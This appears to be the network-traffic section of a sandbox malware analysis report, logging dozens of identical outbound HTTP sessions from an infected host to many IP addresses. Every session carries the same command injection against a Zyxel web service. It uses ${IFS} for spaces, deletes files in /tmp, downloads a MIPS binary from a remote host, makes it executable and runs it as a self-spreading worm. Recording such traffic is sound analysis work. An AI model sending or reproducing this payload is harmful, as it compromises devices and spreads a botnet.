                                                Jan 12, 2024 18:24:33.786571026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3844192.168.2.1338356122.128.76.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.786627054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3845192.168.2.133736619.143.75.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.786668062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3846192.168.2.1347618159.100.153.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.786685944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3847192.168.2.135012435.73.52.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.786744118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3848192.168.2.1358786165.191.11.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.786787033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3849192.168.2.133841458.4.42.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.786819935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3850192.168.2.1338162124.39.87.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.786839962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3851192.168.2.135826039.22.52.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.786901951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3852192.168.2.1355068207.233.78.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.786933899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3853192.168.2.1360824154.92.129.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.786971092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3854192.168.2.1339568163.32.32.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.787015915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3855192.168.2.1344950188.122.164.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.787066936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3856192.168.2.1340274184.226.115.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.787105083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3857192.168.2.1339910186.74.254.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.787131071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3858192.168.2.1337278142.117.178.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.787183046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3859192.168.2.1343700117.245.251.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.787201881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3860192.168.2.133828874.39.195.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.787233114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3861192.168.2.1335760140.7.101.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.787275076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3862192.168.2.1355134198.219.8.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.787313938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3863192.168.2.135706076.151.118.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.787336111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3864192.168.2.135537023.27.66.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.787385941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3865192.168.2.136074046.130.151.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.787439108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3866192.168.2.1356314103.182.197.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.787467003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3867192.168.2.1350332113.147.17.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.787506104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3868192.168.2.133773088.118.51.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.787563086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3869192.168.2.133344883.231.0.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.787615061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3870192.168.2.1358566163.61.220.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.787643909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3871192.168.2.1347070192.138.122.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.787681103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3872192.168.2.133625653.30.94.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.787750959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3873192.168.2.1343872131.205.154.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.787798882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3874192.168.2.13369829.249.28.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.787833929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3875192.168.2.133350063.186.90.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.787878036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3876192.168.2.135062083.251.202.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.787920952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3877192.168.2.1344770128.155.166.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.787952900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3878192.168.2.1356700200.139.94.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.787982941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3879192.168.2.1358742155.101.154.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.788017988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3880192.168.2.1333240162.126.55.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.788064957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3881192.168.2.133681817.253.41.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.788096905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3882192.168.2.1342652104.192.219.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.788116932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3883192.168.2.1341872132.140.221.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.788160086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3884192.168.2.135814678.196.75.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.788217068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3885192.168.2.134656275.76.46.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.788252115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3886192.168.2.134175886.245.222.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.788295031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3887192.168.2.136061898.212.142.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.788324118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3888192.168.2.1350848174.71.18.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.788367033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3889192.168.2.1340424213.185.44.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.788402081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3890192.168.2.1344430213.148.30.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.788446903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3891192.168.2.1343618146.120.172.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.788489103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3892192.168.2.135989838.108.56.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.788525105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3893192.168.2.135309093.37.149.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.788570881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3894192.168.2.1341034129.176.83.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.788599014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3895192.168.2.133563447.76.158.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.788647890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3896192.168.2.1357566136.29.152.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.788690090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3897192.168.2.1339238190.182.83.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.788732052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3898192.168.2.1341554203.10.244.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.788770914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3899192.168.2.1332926221.230.118.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.788810968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3900192.168.2.1354676150.199.149.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.788850069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3901192.168.2.135990075.212.242.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.788872004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3902192.168.2.1342212196.99.10.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.788928986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3903192.168.2.135003680.123.95.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.788965940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3904192.168.2.135795618.239.138.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.788996935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3905192.168.2.133880453.71.68.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.789058924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3906192.168.2.1351904167.34.63.50443
                                                TimestampBytes transferredDirectionData
